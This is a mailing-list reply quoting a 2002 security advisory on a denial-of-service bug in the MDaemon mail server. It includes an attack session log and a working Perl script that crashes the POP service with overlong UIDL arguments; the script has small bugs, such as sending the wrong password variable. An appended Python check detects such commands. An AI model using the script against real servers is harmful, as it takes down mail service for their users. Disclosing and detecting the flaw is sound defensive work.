5.0.7 not vulnerable (tested on registered pro server). tested dele and uidl both with over 40b of 1.

-Karl Pietri

----- Original Message -----
From: "D4rkGr3y" <grey_1999@mail.ru>
To: <bugtraq@securityfocus.com>; <submissions@packetstormsecurity.com>; <vulnwatch@vulnwatch.org>
Sent: Sunday, October 27, 2002 11:49 AM
Subject: MDaemon SMTP/POP/IMAP server DoS

> ######################################################
> #Product: MDaemon SMTP/POP/IMAP server               #
> #Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
> #Vulnerable versions: v.6.0.7 and below              #
> #Vulnerability: buffer overflow                      #
> #Bug&exploit by D4rkGr3y [www.dhgroup.org]           #
> ######################################################
>
> #Overview#--------------------------------------------------------------#
> From MDaemon's help file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs of
> any number of individual users and comes complete with a powerful set
> of integrated tools for managing mail accounts and message formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
>
> #Problem#----------------------------------------------------------------#
> Bug found in MDaemon's pop-server. It's possible to kill MDaemon by
> sending long arguments (32b and above) with DELE or UIDL commands.
> To do this u must have at least mail-account on vulnerable host.
> After getting long request from client, all MDaemon's Services will be
> closed (smtp, imap, pop, (?)worldclient).
> Here the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210
> 271036.AA3656130MD0012@dark.ru>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111
>
> Connection to host lost...
>
> #Exploit#----------------------------------------------------------------#
>
> #!/usr/bin/perl
> #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
> use IO::Socket;
> $host = "[vuln_host]";
> $login = "[login]";
> $pass = "[pass]";
> $port = "110";
> $data = "1";
> $num = "32";
> $buf .= $data x $num;
> $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM)
> or die "Couldn't connect: @!\n";
> print $socket "USER $login\n";
> print $socket "PASS $user\n";
> print $socket "UIDL $buf\n";
> close($socket);
>
> #EOF
>
> Best regards www.dhgroup.org
> D4rkGr3y icq 540981
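
An added example, not part of either message above: a detection check for POP3 client lines that flags DELE or UIDL commands whose argument reaches the 32-byte length given in the advisory or is not a decimal message number as RFC 1939 specifies. The function names, the 10-digit bound and the sample session are assumptions constructed for illustration.

```python
import re

# Length reported in the advisory: arguments of 32 bytes and above.
OVERLONG = 32
WATCHED = {b"DELE", b"UIDL"}
# RFC 1939: both commands take a decimal message number.
MSG_NUMBER = re.compile(rb"[0-9]{1,10}")  # 10 digits is an assumed upper bound


def check_line(line: bytes):
    """Return a reason string for a suspicious client line, else None."""
    parts = line.rstrip(b"\r\n").split(None, 1)
    if not parts or parts[0].upper() not in WATCHED:
        return None
    verb = parts[0].upper()
    arg = parts[1].strip() if len(parts) > 1 else b""
    if not arg:
        # UIDL without an argument is valid (list all); DELE requires one.
        return None if verb == b"UIDL" else "missing argument"
    if len(arg) >= OVERLONG:
        return f"argument of {len(arg)} bytes"
    if not MSG_NUMBER.fullmatch(arg):
        return "argument is not a message number"
    return None


def scan(session):
    """Return [(line_no, verb, reason)] for flagged client-to-server lines."""
    hits = []
    for n, line in enumerate(session, 1):
        reason = check_line(line)
        if reason:
            hits.append((n, line.split(None, 1)[0].upper().decode(), reason))
    return hits


# Constructed client-to-server lines (not a real capture).
SAMPLE = [
    b"USER alice\r\n",
    b"PASS example\r\n",
    b"UIDL\r\n",
    b"UIDL 1\r\n",
    b"DELE 2\r\n",
    b"UIDL " + b"1" * 32 + b"\r\n",
    b"dele " + b"1" * 40 + b"\r\n",
    b"DELE abc\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same check can sit in a POP3 proxy in front of an unpatched server to drop the line instead of only logging it.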